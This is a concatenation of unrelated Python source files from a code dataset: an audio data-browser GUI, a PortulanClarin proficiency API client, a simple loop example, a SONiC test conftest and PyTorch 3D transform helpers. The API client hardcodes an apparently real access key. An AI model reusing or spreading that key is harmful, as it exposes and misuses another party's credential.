ax.setXRange(self.specs[c].f0, self.specs[c].f1)\n # update spectrograms:\n self.specs[c].update_spectrum()\n self.setting = False\n\n \n def resizeEvent(self, event):\n if self.show_channels is None or len(self.show_channels) == 0:\n return\n self.adjust_layout(event.size().width(), event.size().height())\n \n\n def adjust_layout(self, width, height):\n xwidth = self.fontMetrics().averageCharWidth()\n xheight = self.fontMetrics().ascent()\n # subtract full data plot:\n data_height = 5*xheight//2 if len(self.show_channels) <= 1 else 3*xheight//2\n if not self.show_fulldata:\n data_height = 0\n height -= len(self.show_channels)*data_height\n # subtract toolbar:\n height -= 
2*xheight\n bottom_channel = self.show_channels[-1]\n trace_frac = self.trace_fracs[self.show_specs]\n #axis_height = None\n #if self.axtraces[bottom_channel].isVisible():\n # axis_height = self.axtraces[bottom_channel].getAxis('bottom').height()\n #elif self.axspecs[bottom_channel].isVisible():\n # axis_height = self.axspecs[bottom_channel].getAxis('bottom').height()\n axis_height = 3.2*xheight\n ntraces = []\n nspecs = []\n nspacer = 0\n for c in self.show_channels:\n if c >= len(self.axspecs) or c >= len(self.axtraces):\n break\n nspecs.append(int(self.axspecs[c].isVisible()))\n ntraces.append(int(self.axtraces[c].isVisible()))\n if self.axspecs[c].isVisible() and self.axtraces[c].isVisible():\n nspacer += 1\n spec_height = (height - len(self.show_channels)*xwidth - nspacer*xwidth - axis_height)/(np.sum(nspecs) + trace_frac*np.sum(ntraces))\n for c, ns, nt in zip(self.show_channels, nspecs, ntraces):\n add_height = axis_height if c == bottom_channel else 0\n self.vbox.setStretch(c, int(ns*spec_height + (nt+ns)*xwidth +\n nt*trace_frac*spec_height + add_height))\n t_height = max(0, int(nt*(trace_frac*spec_height + add_height)))\n self.figs[c].ci.layout.setRowFixedHeight(2, t_height)\n self.figs[c].ci.layout.setRowFixedHeight(1, (nt+ns-1)*xwidth)\n s_height = max(0, int(ns*spec_height + (1-nt)*add_height))\n self.figs[c].ci.layout.setRowFixedHeight(0, s_height)\n # fix full data plot:\n self.datafig.update_layout(self.show_channels, data_height)\n self.datafig.setVisible(self.show_fulldata)\n # update:\n for c in self.show_channels:\n self.figs[c].update()\n \n \n def show_xticks(self, channel, show_ticks):\n if self.axtraces[channel].isVisible():\n self.axtraces[channel].getAxis('bottom').showLabel(show_ticks)\n self.axtraces[channel].getAxis('bottom').setStyle(showValues=show_ticks)\n self.axspecs[channel].getAxis('bottom').showLabel(False)\n self.axspecs[channel].getAxis('bottom').setStyle(showValues=False)\n elif self.axspecs[channel].isVisible():\n self.axspecs[channel].getAxis('bottom').showLabel(show_ticks)\n self.axspecs[channel].getAxis('bottom').setStyle(showValues=show_ticks)\n\n\n def set_times(self, toffset=None, twindow=None, dispatch=True):\n self.setting = True\n if not toffset is None:\n self.toffset = toffset\n if not twindow is None:\n self.twindow = twindow\n n2 = ceil(self.tmax / (0.5*self.twindow))\n ttmax = max(self.twindow, n2*0.5*self.twindow)\n for axs in self.axts:\n for ax in axs:\n ax.setLimits(xMax=ttmax, maxXRange=ttmax)\n if self.isVisible():\n ax.setXRange(self.toffset, self.toffset + self.twindow)\n self.setting = False\n if dispatch:\n self.sigTimesChanged.emit(self.toffset, self.twindow)\n\n \n def update_times(self, viewbox, trange):\n if self.setting:\n return\n self.toffset = trange[0]\n self.twindow = trange[1] - trange[0]\n self.set_times()\n \n \n def zoom_time_in(self):\n if self.twindow * self.rate >= 20:\n self.twindow *= 0.5\n self.set_times()\n \n \n def zoom_time_out(self):\n if self.toffset + self.twindow < self.tmax:\n self.twindow *= 2.0\n self.set_times()\n\n \n def time_seek_forward(self):\n if self.toffset + self.twindow < self.tmax:\n self.toffset += 0.5*self.twindow\n self.set_times()\n\n \n def time_seek_backward(self):\n if self.toffset > 0:\n self.toffset -= 0.5*self.twindow\n if self.toffset < 0.0:\n self.toffset = 0.0\n self.set_times()\n\n \n def time_forward(self):\n if self.toffset + self.twindow < self.tmax:\n self.toffset += 0.05*self.twindow\n self.set_times()\n\n \n def time_backward(self):\n if self.toffset > 0.0:\n 
self.toffset -= 0.05*self.twindow\n if self.toffset < 0.0:\n self.toffset = 0.0\n self.set_times()\n\n \n def time_home(self):\n if self.toffset > 0.0:\n self.toffset = 0.0\n self.set_times()\n\n \n def time_end(self):\n n2 = np.floor(self.tmax / (0.5*self.twindow))\n toffs = max(0, n2-1) * 0.5*self.twindow\n if self.toffset < toffs:\n self.toffset = toffs\n self.set_times()\n\n \n def snap_time(self):\n twindow = 10.0 * 2**np.round(log(self.twindow/10.0)/log(2.0))\n toffset = np.round(self.toffset / (0.5*twindow)) * (0.5*twindow)\n if twindow != self.twindow or toffset != self.toffset:\n self.set_times(toffset, twindow)\n\n\n def set_amplitudes(self, ymin=None, ymax=None):\n self.setting = True\n for c in self.selected_channels:\n if not ymin is None:\n self.traces[c].ymin = ymin\n if not ymax is None:\n self.traces[c].ymax = ymax\n if self.isVisible():\n for ax in self.axys[c]:\n ax.setYRange(self.traces[c].ymin, self.traces[c].ymax)\n self.setting = False\n\n \n def update_amplitudes(self, viewbox, arange):\n if self.setting:\n return\n self.set_amplitudes(arange[0], arange[1])\n self.sigAmplitudesChanged.emit(arange[0], arange[1])\n \n\n def zoom_ampl_in(self):\n for c in self.selected_channels:\n self.traces[c].zoom_ampl_in()\n self.set_amplitudes()\n\n \n def zoom_ampl_out(self):\n for c in self.selected_channels:\n self.traces[c].zoom_ampl_out()\n self.set_amplitudes()\n \n \n def auto_ampl(self):\n for c in self.selected_channels:\n self.traces[c].auto_ampl(self.toffset, self.twindow)\n self.set_amplitudes()\n\n \n def reset_ampl(self):\n for c in self.selected_channels:\n self.traces[c].reset_ampl()\n self.set_amplitudes()\n\n\n def center_ampl(self):\n for c in self.selected_channels:\n self.traces[c].center_ampl()\n self.set_amplitudes()\n\n\n def set_frequencies(self, f0=None, f1=None):\n self.setting = True\n for c in self.selected_channels:\n if not f0 is None:\n self.specs[c].f0 = f0\n if not f1 is None:\n self.specs[c].f1 = f1\n if self.isVisible():\n for ax in self.axfys[c]:\n ax.setYRange(self.specs[c].f0, self.specs[c].f1)\n for ax in self.axfxs[c]:\n ax.setXRange(self.specs[c].f0, self.specs[c].f1)\n self.setting = False\n\n \n def update_frequencies(self, viewbox, frange):\n if self.setting:\n return\n self.set_frequencies(frange[0], frange[1])\n self.sigFrequenciesChanged.emit(frange[0], frange[1])\n \n \n def zoom_freq_in(self):\n for c in self.selected_channels:\n self.specs[c].zoom_freq_in()\n self.set_frequencies()\n \n \n def zoom_freq_out(self):\n for c in self.selected_channels:\n self.specs[c].zoom_freq_out()\n self.set_frequencies()\n \n \n def freq_down(self):\n for c in self.selected_channels:\n self.specs[c].freq_down()\n self.set_frequencies()\n\n \n def freq_up(self):\n for c in self.selected_channels:\n self.specs[c].freq_up()\n self.set_frequencies()\n\n\n def freq_home(self):\n for c in self.selected_channels:\n self.specs[c].freq_home()\n self.set_frequencies()\n\n \n def freq_end(self):\n for c in self.selected_channels:\n self.specs[c].freq_end()\n self.set_frequencies()\n\n\n def set_resolution(self, nfft=None, step_frac=None, dispatch=True):\n self.setting = True\n if not isinstance(nfft, list):\n nfft = [nfft] * (np.max(self.selected_channels) + 1)\n if not isinstance(step_frac, list):\n step_frac = [step_frac] * (np.max(self.selected_channels) + 1)\n for c in self.selected_channels:\n self.specs[c].set_resolution(nfft[c], step_frac[c],\n self.isVisible())\n self.nfftw.setCurrentText(f'{self.specs[self.current_channel].nfft}')\n self.setting = 
False\n if dispatch:\n self.sigResolutionChanged.emit()\n\n \n def freq_resolution_down(self):\n for c in self.selected_channels:\n self.specs[c].freq_resolution_down()\n self.set_resolution()\n\n \n def freq_resolution_up(self):\n for c in self.selected_channels:\n self.specs[c].freq_resolution_up()\n self.set_resolution()\n\n\n def step_frac_down(self):\n for c in self.selected_channels:\n self.specs[c].step_frac_down()\n self.set_resolution()\n\n\n def step_frac_up(self):\n for c in self.selected_channels:\n self.specs[c].step_frac_up()\n self.set_resolution()\n\n\n def set_power(self, zmin=None, zmax=None, dispatch=True):\n self.setting = True\n if not isinstance(zmin, list):\n zmin = [zmin] * (np.max(self.selected_channels) + 1)\n if not isinstance(zmax, list):\n zmax = [zmax] * (np.max(self.selected_channels) + 1)\n for c in self.selected_channels:\n self.specs[c].set_power(zmin[c], zmax[c])\n self.setting = False\n if dispatch:\n self.sigPowerChanged.emit()\n\n\n def update_power(self, cbar):\n if self.setting:\n return\n self.set_power(cbar.levels()[0], cbar.levels()[1])\n\n\n def power_up(self):\n for c in self.selected_channels:\n self.specs[c].zmax += 5.0\n self.specs[c].zmin += 5.0\n self.set_power()\n\n\n def power_down(self):\n for c in self.selected_channels:\n self.specs[c].zmax -= 5.0\n self.specs[c].zmin -= 5.0\n self.set_power()\n\n\n def max_power_up(self):\n for c in self.selected_channels:\n self.specs[c].zmax += 5.0\n self.set_power()\n\n\n def max_power_down(self):\n for c in self.selected_channels:\n self.specs[c].zmax -= 5.0\n self.set_power()\n\n\n def min_power_up(self):\n for c in self.selected_channels:\n self.specs[c].zmin += 5.0\n self.set_power()\n\n\n def min_power_down(self):\n for c in self.selected_channels:\n self.specs[c].zmin -= 5.0\n self.set_power()\n\n\n def highpass_cutoff_up(self):\n highpass_cutoff = self.traces[self.current_channel].highpass_cutoff\n lowpass_cutoff = self.traces[self.current_channel].lowpass_cutoff\n step = 1.0\n if highpass_cutoff >= 1.0:\n step = 0.5*10**(floor(log10(highpass_cutoff)))\n elif highpass_cutoff == 0.0:\n step = 100.0\n highpass_cutoff += step\n if highpass_cutoff + step > lowpass_cutoff:\n highpass_cutoff = lowpass_cutoff - step\n if highpass_cutoff < 0:\n highpass_cutoff = 0\n self.update_filter(self.current_channel, highpass_cutoff,\n None, True)\n\n\n def highpass_cutoff_down(self):\n highpass_cutoff = self.traces[self.current_channel].highpass_cutoff\n step = 1.0\n if highpass_cutoff >= 1.0:\n step = 0.5*10**(floor(log10(highpass_cutoff)))\n step = 0.5*10**(floor(log10(highpass_cutoff - 0.1*step)))\n highpass_cutoff -= step\n if highpass_cutoff < 0:\n highpass_cutoff = 0\n self.update_filter(self.current_channel, highpass_cutoff,\n None, True)\n\n\n def lowpass_cutoff_up(self):\n lowpass_cutoff = self.traces[self.current_channel].lowpass_cutoff\n step = 1.0\n if lowpass_cutoff >= 1.0:\n step = 0.5*10**(floor(log10(lowpass_cutoff)))\n lowpass_cutoff += step\n if lowpass_cutoff > self.rate/2:\n lowpass_cutoff = self.rate/2\n self.update_filter(self.current_channel, None,\n lowpass_cutoff, True)\n\n\n def lowpass_cutoff_down(self):\n highpass_cutoff = self.traces[self.current_channel].highpass_cutoff\n lowpass_cutoff = self.traces[self.current_channel].lowpass_cutoff\n step = 1.0\n if lowpass_cutoff >= 1.0:\n step = 0.5*10**(floor(log10(lowpass_cutoff)))\n step = 0.5*10**(floor(log10(lowpass_cutoff - 0.1*step)))\n if lowpass_cutoff < highpass_cutoff + step:\n return\n lowpass_cutoff -= step\n if lowpass_cutoff 
< highpass_cutoff + step:\n lowpass_cutoff = highpass_cutoff + step\n self.update_filter(self.current_channel, None,\n lowpass_cutoff, True)\n\n\n def set_filter(self, highpass_cutoffs, lowpass_cutoffs):\n self.setting = True\n for c in range(self.data.channels):\n cf = c if c < len(highpass_cutoffs) else -1\n self.traces[c].set_filter(highpass_cutoffs[cf],\n lowpass_cutoffs[cf])\n self.axspecs[c].set_filter(highpass_cutoffs[cf],\n lowpass_cutoffs[cf])\n self.setting = False\n\n\n def update_filter(self, channel, highpass_cutoff,\n lowpass_cutoff, set_spec=False):\n if channel in self.selected_channels:\n for c in self.selected_channels:\n self.traces[c].set_filter(highpass_cutoff, lowpass_cutoff)\n if c != channel or set_spec:\n self.axspecs[c].set_filter(highpass_cutoff, lowpass_cutoff)\n else:\n self.traces[channel].set_filter(highpass_cutoff, lowpass_cutoff)\n self.sigFilterChanged.emit()\n\n\n def init_filter(self, highpass_cutoff, lowpass_cutoff):\n if highpass_cutoff is None:\n highpass_cutoff = 0.0\n if lowpass_cutoff is None:\n lowpass_cutoff = self.rate/2\n for t in self.traces:\n t.set_filter(highpass_cutoff, lowpass_cutoff)\n for axs in self.axspecs:\n axs.set_filter(highpass_cutoff, lowpass_cutoff)\n\n \n def all_channels(self):\n self.selected_channels = list(self.show_channels)\n self.update_borders()\n\n\n def next_channel(self):\n if len(self.show_channels) == 1:\n self.show_channel(self.current_channel + 1)\n else:\n idx = self.show_channels.index(self.current_channel)\n if idx + 1 < len(self.show_channels):\n self.current_channel = self.show_channels[idx + 1]\n self.selected_channels = [self.current_channel]\n self.update_borders()\n\n\n def previous_channel(self):\n if len(self.show_channels) == 1:\n self.show_channel(self.current_channel - 1)\n else:\n idx = self.show_channels.index(self.current_channel)\n if idx > 0:\n self.current_channel = self.show_channels[idx - 1]\n self.selected_channels = [self.current_channel]\n self.update_borders()\n\n\n def select_next_channel(self):\n if len(self.show_channels) == 1:\n self.show_channel(self.current_channel + 1)\n else:\n idx = self.show_channels.index(self.current_channel)\n if idx + 1 < len(self.show_channels):\n self.current_channel = self.show_channels[idx + 1]\n self.selected_channels.append(self.current_channel)\n self.update_borders()\n\n\n def select_previous_channel(self):\n if len(self.show_channels) == 1:\n self.show_channel(self.current_channel - 1)\n else:\n idx = self.show_channels.index(self.current_channel)\n if idx > 0:\n self.current_channel = self.show_channels[idx - 1]\n self.selected_channels.append(self.current_channel)\n self.update_borders()\n\n \n def select_channels(self, channels):\n sc = [c for c in channels if c in self.show_channels]\n if len(sc) == 0:\n return\n self.selected_channels = sc\n if not self.current_channel in self.selected_channels:\n for c in self.selected_channels:\n if c >= self.current_channel:\n self.current_channel = c\n break\n else:\n if len(self.selected_channels) > 0:\n self.current_channel = self.selected_channels[0]\n self.update_borders()\n \n \n def set_channels(self, show_channels=None, selected_channels=None):\n if not show_channels is None:\n if self.data is None:\n self.channels = show_channels\n return\n self.show_channels = [c for c in show_channels if c < len(self.figs)]\n self.selected_channels = [c for c in selected_channels if c < len(self.figs)]\n if not self.current_channel in self.selected_channels:\n for c in self.selected_channels:\n if c >= 
self.current_channel:\n self.current_channel = c\n break\n if not self.current_channel in self.selected_channels:\n self.current_channel = self.selected_channels[-1]\n for c in range(len(self.figs)):\n self.figs[c].setVisible(c in self.show_channels)\n self.show_xticks(c, c == self.show_channels[-1])\n self.acts.channels[c].setChecked(c in self.show_channels)\n self.adjust_layout(self.width(), self.height())\n self.update_borders()\n \n \n def toggle_channel(self, channel):\n if self.acts.channels[channel].isChecked():\n if not channel in self.show_channels:\n self.show_channels.append(channel)\n self.show_channels.sort()\n self.selected_channels.append(channel)\n self.selected_channels.sort()\n self.set_channels()\n else:\n if channel in self.show_channels:\n self.show_channels.remove(channel)\n if len(self.show_channels) == 0:\n c = channel + 1\n if c >= self.data.channels:\n c = 0\n self.show_channels = [c]\n if not c in self.selected_channels:\n self.selected_channels.append(c)\n self.selected_channels.sort()\n if channel in self.selected_channels:\n self.selected_channels.remove(channel)\n if len(self.selected_channels) == 0:\n for c in self.show_channels:\n if c < channel:\n self.current_channel = c\n else:\n break\n self.selected_channels = [self.current_channel]\n #if len(self.show_channels) == 1:\n # self.acts.channels[self.show_channels[0]].setCheckable(False)\n self.set_channels()\n self.setFocus()\n\n \n def show_channel(self, channel):\n if channel < 0 or channel >= len(self.figs):\n return\n self.current_channel = channel\n self.set_channels([channel], [channel])\n\n \n def set_panels(self, traces=None, specs=None, cbars=None):\n if not traces is None:\n self.show_traces = traces\n if not specs is None:\n self.show_specs = specs\n if not cbars is None:\n self.show_cbars = cbars\n for axt, axs, cb in zip(self.axtraces, self.axspecs, self.cbars):\n axt.setVisible(self.show_traces)\n axs.setVisible(self.show_specs > 0)\n cb.setVisible(self.show_specs > 0 and self.show_cbars)\n if axt is self.axtraces[self.show_channels[-1]]:\n axs.getAxis('bottom').showLabel(not self.show_traces)\n axs.getAxis('bottom').setStyle(showValues=not self.show_traces)\n axt.getAxis('bottom').showLabel(self.show_traces)\n axt.getAxis('bottom').setStyle(showValues=self.show_traces)\n self.adjust_layout(self.width(), self.height())\n \n\n def toggle_traces(self):\n self.show_traces = not self.show_traces\n if not self.show_traces:\n self.show_specs = 1\n self.set_panels()\n \n\n def toggle_spectrograms(self):\n self.show_specs += 1\n if self.show_specs > 4:\n self.show_specs = 0\n if self.show_specs == 0:\n self.show_traces = True\n self.set_panels()\n\n \n def toggle_colorbars(self):\n self.show_cbars = not self.show_cbars\n for cb, axs in zip(self.cbars, self.axspecs):\n if axs.isVisible():\n cb.setVisible(self.show_cbars)\n \n \n def set_fulldata(self, show):\n self.show_fulldata = show\n self.datafig.setVisible(self.show_fulldata)\n self.adjust_layout(self.width(), self.height())\n \n \n def toggle_fulldata(self):\n self.show_fulldata = not self.show_fulldata\n self.set_fulldata(self.show_fulldata)\n \n \n def toggle_grids(self):\n self.grids -= 1\n if self.grids < 0:\n self.grids = 3\n for c in self.selected_channels:\n for ax in self.axgs[c]:\n ax.showGrid(x=(self.grids & 1) > 0, y=(self.grids & 2) > 0,\n alpha=0.8)\n # fix grid bug:\n ax.getAxis('bottom').setGrid(False)\n ax.getAxis('left').setGrid(False)\n for axis in ['right', 'top']:\n ax.showAxis(axis)\n 
ax.getAxis(axis).setStyle(showValues=False)\n\n\n def set_zoom_mode(self, mode):\n for axs in self.axs:\n for ax in axs:\n ax.getViewBox().setMouseMode(mode)\n\n\n def zoom_back(self):\n for axs in self.axs:\n for ax in axs:\n ax.getViewBox().zoom_back()\n\n\n def zoom_forward(self):\n for axs in self.axs:\n for ax in axs:\n ax.getViewBox().zoom_forward()\n\n\n def zoom_home(self):\n for axs in self.axs:\n for ax in axs:\n ax.getViewBox().zoom_home()\n\n\n def set_region_mode(self, mode):\n self.region_mode = mode\n\n\n def region_menu(self, channel, vbox, rect):\n if self.region_mode == DataBrowser.zoom_region:\n vbox.zoom_region(rect)\n elif self.region_mode == DataBrowser.play_region:\n self.play_region(rect.left(), rect.right())\n elif self.region_mode == DataBrowser.save_region:\n self.save_region(rect.left(), rect.right())\n elif self.region_mode == DataBrowser.ask_region:\n menu = QMenu(self)\n zoom_act = menu.addAction('&Zoom')\n #analyze_act = menu.addAction('&Analyze')\n play_act = menu.addAction('&Play')\n save_act = menu.addAction('&Save as')\n #crop_act = menu.addAction('&Crop')\n act = menu.exec(QCursor.pos())\n if act is zoom_act:\n vbox.zoom_region(rect)\n elif act is play_act:\n self.play_region(rect.left(), rect.right())\n elif act is save_act:\n self.save_region(rect.left(), rect.right())\n vbox.hide_region()\n\n\n def play_scroll(self):\n if self.scroll_timer.isActive():\n self.scroll_timer.stop()\n self.scroll_step /= 2\n elif self.audio_timer.isActive():\n self.audio.stop()\n self.audio_timer.stop()\n for amarkers in self.audio_markers:\n for vmarker in amarkers:\n vmarker.setValue(-1)\n else:\n self.play_window()\n \n\n def auto_scroll(self):\n if self.scroll_step == 0:\n self.scroll_step = 0.05\n elif self.scroll_step > 1.0:\n if self.scroll_timer.isActive():\n self.scroll_timer.stop()\n self.scroll_step = 0\n return\n else:\n self.scroll_step *= 2\n if not self.scroll_timer.isActive():\n self.scroll_timer.start(20)\n\n \n def scroll_further(self):\n if self.toffset + self.twindow > self.tmax:\n self.scroll_timer.stop()\n self.scroll_step /= 2\n else:\n self.set_times(self.toffset + self.scroll_step)\n\n\n def play_region(self, t0, t1):\n i0 = int(np.round(t0*self.rate))\n i1 = int(np.round(t1*self.rate))\n playdata = 1.0*self.data[i0:i1, self.selected_channels]\n fade(playdata, self.rate, 0.1)\n self.audio.play(playdata, self.rate, blocking=False)\n self.audio_time = t0\n self.audio_tmax = t1\n self.audio_timer.start(50)\n for c in range(self.data.channels):\n atime = self.audio_time if c in self.selected_channels else -1\n for vmarker in self.audio_markers[c]:\n vmarker.setValue(atime)\n\n\n def play_window(self):\n self.play_region(self.toffset, self.toffset + self.twindow)\n\n \n def mark_audio(self):\n self.audio_time += 0.05\n for amarkers in self.audio_markers:\n for vmarker in amarkers:\n if vmarker.value() >= 0:\n vmarker.setValue(self.audio_time)\n if self.audio_time > self.audio_tmax:\n self.audio_timer.stop()\n for amarkers in self.audio_markers:\n for vmarker in amarkers:\n vmarker.setValue(-1)\n\n \n def save_region(self, t0, t1):\n\n def secs_to_str(time):\n hours = time//3600\n time -= 3600*hours\n mins = time//60\n time -= 60*mins\n secs = int(np.floor(time))\n time -= secs\n msecs = f'{1000*time:03.0f}ms'\n if hours > 0:\n return f'{hours}h{mins}m{secs}s{msecs}'\n elif mins > 0:\n return f'{mins}m{secs}s{msecs}'\n elif secs > 0:\n return f'{secs}s{msecs}'\n else:\n return msecs\n\n i0 = int(np.round(t0*self.rate))\n i1 = 
int(np.round(t1*self.rate))\n name = os.path.splitext(os.path.basename(self.file_path))[0]\n #if self.channel > 0:\n # filename = f'{name}-{channel:d}-{t0:.4g}s-{t1s:.4g}s.wav'\n t0s = secs_to_str(t0)\n t1s = secs_to_str(t1)\n file_name = f'{name}-{t0s}-{t1s}.wav'\n formats = available_formats()\n for f in ['MP3', 'OGG', 'WAV']:\n if 'WAV' in formats:\n formats.remove(f)\n formats.insert(0, f)\n filters = ['All files (*)'] + [f'{f} files (*.{f}, *.{f.lower()})' for f in formats]\n file_path = os.path.join(os.path.dirname(self.file_path), file_name)\n file_path = QFileDialog.getSaveFileName(self, 'Save region as',\n file_path,\n ';;'.join(filters))[0]\n if file_path:\n write_audio(file_path, self.data[i0:i1,:], self.rate)\n print('saved region to: ' , file_path)\n\n \n def save_window(self):\n self.save_region(self.toffset, self.toffset + self.twindow)\n","repo_name":"bendalab/audian","sub_path":"audian/databrowser.py","file_name":"databrowser.py","file_ext":"py","file_size_in_byte":60757,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"24159674884","text":"import json\nimport requests\n\nkey = '265cc97a8fc6bb1b657b3969b673f19f'\nformat = 'text' \nurl = \"https://portulanclarin.net/workbench/lx-proficiency/api/\"\n\n\ntext = '''\nOlá, meu nome é Miguel, e eu venho dos Açores. Tenho 35 anos e sou engenheiro civil.\n'''\n\nrequest_data = {\n 'method': 'analyse',\n 'jsonrpc': '2.0',\n 'id': 0,\n 'params': {\n 'text': text,\n 'format': format,\n 'key': key,\n },\n}\nrequest = requests.post(url, json=request_data)\nresponse_data = request.json()\nif \"error\" in response_data:\n print(\"Error:\", response_data[\"error\"])\nelse:\n print(\"Result:\")\n print(response_data[\"result\"].split(\"\\n\")[4][-2:])\n\n\n\n# Getting acess key status:\nrequest_data = {\n 'method': 'key_status',\n 'jsonrpc': '2.0',\n 'id': 0,\n 'params': {\n 'key': key,\n },\n}\nrequest = requests.post(url, json=request_data)\nresponse_data = request.json()\nif \"error\" in response_data:\n print(\"Error:\", response_data[\"error\"])\nelse:\n print(\"Key status:\")\n print(json.dumps(response_data[\"result\"], indent=4))","repo_name":"joaoDossena/MasterThesis","sub_path":"Task 1 - Proficiency classification/portuclarin_lx_proficiency.py","file_name":"portuclarin_lx_proficiency.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"28458276229","text":"# while loop\n\ni = 0\n\nwhile i < 10: # i = 0 , 0<10 , i =1 , 1<10\n if i % 2 == 0:\n print(i,\"even\")\n else:\n print(i,\"odd\") \n i = i + 1 #1,2\n print(\"Thank you\")\n","repo_name":"mogan92/chn6263","sub_path":"whileloop.py","file_name":"whileloop.py","file_ext":"py","file_size_in_byte":204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74810198345","text":"import pytest\n\nfrom tests.common.fixtures.advanced_reboot import get_advanced_reboot\nfrom .args.advanced_reboot_args import add_advanced_reboot_args\nfrom .args.cont_warm_reboot_args import add_cont_warm_reboot_args\nfrom .args.normal_reboot_args import add_normal_reboot_args\n\n\n@pytest.fixture(autouse=True, scope=\"module\")\ndef skip_on_simx(duthost):\n platform = duthost.facts[\"platform\"]\n if \"simx\" in platform:\n pytest.skip('skipped on this platform: {}'.format(platform))\n\n\n# Platform pytest arguments\ndef pytest_addoption(parser):\n add_advanced_reboot_args(parser)\n 
add_cont_warm_reboot_args(parser)\n add_normal_reboot_args(parser)\n\n\ndef pytest_generate_tests(metafunc):\n if 'power_off_delay' in metafunc.fixturenames:\n delays = metafunc.config.getoption('power_off_delay')\n default_delay_list = [5, 15]\n if not delays:\n # if power_off_delay option is not present, set it to default [5, 15] for backward compatible\n metafunc.parametrize('power_off_delay', default_delay_list)\n else:\n try:\n delay_list = [int(delay.strip()) for delay in delays.split(',')]\n metafunc.parametrize('power_off_delay', delay_list)\n except ValueError:\n metafunc.parametrize('power_off_delay', default_delay_list)\n","repo_name":"ANISH-GOTTAPU/sonic-mgmt-anish","sub_path":"tests/platform_tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"15733570079","text":"import torch\n\n\ndef transform_voxel_to_match_image(voxel):\n # in: bsz, channels, height, width, depth\n # out: bsz, channels, width, height, depth\n voxel = voxel.permute(0, 1, 3, 2, 4)\n # for camera mirror flip across width\n voxel = voxel.flip(2)\n\n return voxel\n\n\ndef generate_transform_matrix(transform_params):\n # bsz = transform_params.size(0)\n Ry = rad2Ry(transform_params[:, 0])\n Rx = rad2Rx(transform_params[:, 1])\n # Rz = rad2Ry(transform_params[:, 0])\n S = scale2S(transform_params[:, 3:6])\n T = translation2T(transform_params[:, 6:])\n\n # transforms are performed from left to right\n # first rotation, then scale and finally translation\n A = torch.bmm(torch.bmm(torch.bmm(Ry, Rx), S), T)\n return A\n\n\ndef generate_transform_matrix_with_recentering(\n transform_params, in_size=64, out_size=64\n):\n bsz = transform_params.size(0)\n Ry = rad2Ry(transform_params[:, 0])\n Rx = rad2Rx(transform_params[:, 1])\n # Rz = rad2Ry(transform_params[:, 0])\n S = scale2S(transform_params[:, 3:6])\n T = translation2T(transform_params[:, 6:])\n\n # Move origin to old grid center translation\n # This is to rotate the objects around it's origin\n CO = (\n translation2T(torch.tensor([[-in_size * 0.5, -in_size * 0.5, -in_size * 0.5]]))\n .repeat(bsz, 1, 1)\n .to(transform_params.device)\n )\n # Move origin to new grid border\n DN = (\n translation2T(torch.tensor([[out_size * 0.5, out_size * 0.5, out_size * 0.5]]))\n .repeat(bsz, 1, 1)\n .to(transform_params.device)\n )\n\n # DN * T * S * Rx * Ry * CO\n A = torch.bmm(torch.bmm(torch.bmm(torch.bmm(torch.bmm(DN, T), S), Rx), Ry), CO)\n return A\n\n\ndef generate_inv_transform_matrix(\n transform_params, in_size=64, out_size=64,\n):\n bsz = transform_params.size(0)\n Ry_inv = invR(rad2Ry(transform_params[:, 0]))\n Rx_inv = invR(rad2Ry(transform_params[:, 1]))\n # Rz = rad2Ry(transform_params[:, 0])\n S_inv = invS(scale2S(transform_params[:, 3:6]))\n T_inv = invT(translation2T(transform_params[:, 6:]))\n\n # Move origin to old grid center translation\n # This is to rotate the objects around it's origin\n CO_inv = (\n invT(\n translation2T(\n torch.tensor([[-in_size * 0.5, -in_size * 0.5, -in_size * 0.5]])\n )\n )\n .repeat(bsz, 1, 1)\n .to(transform_params.device)\n )\n # Move origin to new grid border\n DN_inv = (\n invT(\n translation2T(\n torch.tensor([[out_size * 0.5, out_size * 0.5, out_size * 0.5]])\n )\n )\n .repeat(bsz, 1, 1)\n .to(transform_params.device)\n )\n\n # CO^-1 * Ry^-1 * Rx^-1 * S^-1 * T^-1 * DN^-1\n A = torch.bmm(\n torch.bmm(\n torch.bmm(torch.bmm(torch.bmm(CO_inv, Ry_inv), Rx_inv), S_inv), T_inv\n ),\n 
DN_inv,\n )\n return A\n\n\ndef rad2Ry(radians, requires_grad=False):\n bsz = radians.size(0)\n radians = radians.view(bsz)\n R = torch.eye(4).unsqueeze(0).repeat(bsz, 1, 1)\n R[:, 0, 0] = torch.cos(radians)\n R[:, 0, 2] = -torch.sin(radians)\n R[:, 2, 0] = torch.sin(radians)\n R[:, 2, 2] = torch.cos(radians)\n\n return R.to(radians.device)\n\n\ndef rad2Rx(radians, requires_grad=False):\n bsz = radians.size(0)\n radians = radians.view(bsz)\n R = torch.eye(4).unsqueeze(0).repeat(bsz, 1, 1)\n R[:, 0, 0] = torch.cos(radians)\n R[:, 0, 1] = torch.sin(radians)\n R[:, 1, 0] = -torch.sin(radians)\n R[:, 1, 1] = torch.cos(radians)\n\n return R.to(radians.device)\n\n\ndef invR(R):\n return R.transpose(1, 2)\n\n\ndef translation2T(translation, requires_grad=False):\n bsz = translation.size(0)\n T = torch.eye(4).unsqueeze(0).repeat(bsz, 1, 1)\n T[:, :3, 3] = translation\n\n return T.to(translation.device)\n\n\ndef invT(T):\n T_inv = T.clone()\n T_inv[:, :3, 3] = -T_inv[:, :3, 3]\n return T_inv\n\n\ndef scale2S(scale):\n bsz = scale.size(0)\n S = torch.eye(4).unsqueeze(0).repeat(bsz, 1, 1)\n S[:, 0, 0] = scale[:, 0]\n S[:, 1, 1] = scale[:, 1]\n S[:, 2, 2] = scale[:, 2]\n\n return S.to(scale.device)\n\n\ndef invS(S):\n r = 1 / S.diagonal(dim1=1, dim2=2)\n S_inv = S.clone()\n S_inv[:, 0, 0] = r[:, 0]\n S_inv[:, 1, 1] = r[:, 1]\n S_inv[:, 2, 2] = r[:, 2]\n return S_inv\n","repo_name":"sebamenabar/SPACE-Pytorch-Implementation","sub_path":"utils/transformation_utils.py","file_name":"transformation_utils.py","file_ext":"py","file_size_in_byte":4302,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} 